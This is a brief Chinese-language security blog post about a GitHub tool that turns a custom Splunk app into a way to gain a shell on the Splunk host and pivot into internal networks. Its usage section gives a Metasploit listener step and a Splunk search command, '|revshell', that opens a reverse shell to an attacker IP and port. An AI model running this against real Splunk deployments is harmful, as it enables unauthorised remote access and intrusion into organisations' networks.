首页 网络安全 正文
通过splunk自定义app获取shell

 2019-04-18    1379  

       Splunk是一个日志、流量聚合分析工具,通常用于防御分析和基础设施管理。正日Github作者说的,虽然这些工具可以很好地发现安全事件及风险,但它们也会反过来被攻击者利用,攻陷splunk并渗透内网中,成为管理员的噩梦。

使用方法:

上传APP后,本地使用MSF监听,并在splunk中执行以下语句即可获取shell

|revshell msf <attacker IP> <attacker port>

GitHub传送门


  •  标签:  

发表评论:(注:评论后刷新即可见!请不要发布无营养评论)

原文链接:https://ceacer.cn/?id=48

=========================================

https://ceacer.cn/ 为 “Ceacer 网安” 唯一官方服务平台,请勿相信其他任何渠道。

收录情况:

热门文章
热门标签
最新留言
  • 11

    小游客 2023年09月24日

  • 2xx

    小游客 2023年09月24日

  • 31

    小游客 2023年09月24日

  • 4111

    小游客 2023年09月24日

  • 5dsa5d4fs

    小游客 2023年09月24日

友情链接

首页 百度 搜狗 AMA短域 Evolution Host

本站转载作品版权归原作者及来源网站所有,原创内容作品版权归作者所有,任何内容转载、商业用途等均须联系原作者并注明来源。

Copyright © 2018-2023,Powered By Ceacer 网安, ,服务器由 Cloudflare 支持

请启用JavaScript以继续访问本站
本站需要JavaScript才能正常运行。请按以下步骤启用JavaScript:
  1. 在浏览器设置中找到JavaScript选项。
  2. 启用JavaScript并保存设置。
  3. 刷新本页面。